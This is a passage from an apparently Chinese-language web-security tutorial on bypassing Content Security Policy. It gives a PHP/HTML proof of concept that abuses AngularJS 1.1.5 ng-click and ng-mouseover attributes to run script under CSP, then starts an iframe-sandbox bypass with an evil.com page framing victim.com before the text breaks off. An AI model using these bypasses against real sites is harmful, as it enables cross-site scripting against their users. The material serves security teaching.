AngularJS是为数不多的支持CSP模式的MVC框架，在早起版本中可以构造多种方式绕过CSP防御。

CSP Bypasses with AngularJS 1.0.8 and 1.1.5

例如：XSS via Click & Hover (ng-click & ng-mouseover attribute)

<?php

header('X-Content-Security-Policy: default-src \'self\' ajax.googleapis.com');

header('Content-Security-Policy: default-src \'self\' ajax.googleapis.com');

header('X-Webkit-CSP: default-src \'self\' ajax.googleapis.com');

header('Set-Cookie: abc=123');

?><!doctype html>

<html ng-app ng-csp>

<head>

<script src="http://ajax.googleapis.com/ajax/libs/angularjs/1.1.5/angular.min.js"></script>

</head>

<body ng-click="$event.view.alert(1)">

Click me

<h1 ng-mouseover="$event.target.ownerDocument.defaultView.alert(2)">Hover me</h1>

</body>

更多的可以看https://code.google.com/p/mustache-security/wiki/AngularJS

♦策略优先级绕过

在浏览器的保护策略中，有很多是重复的。比如A策略可以抵御C攻击，B策略也可以抵御C攻击。此处的抵御可以是阻断也可以是放行。于是当AB同时作用于C攻击上时，Bypass就可能发生。

（1）Iframe sandbox 和 CSP sandbox

当iframe sandbox允许执行JS，而CSP不允许执行JS，问题就发生了，CSP就被bypass了。

//evil.com

<iframe sandbox=""allow-scripts"" src="//victim.com/csp.html">

//victim.com

<?php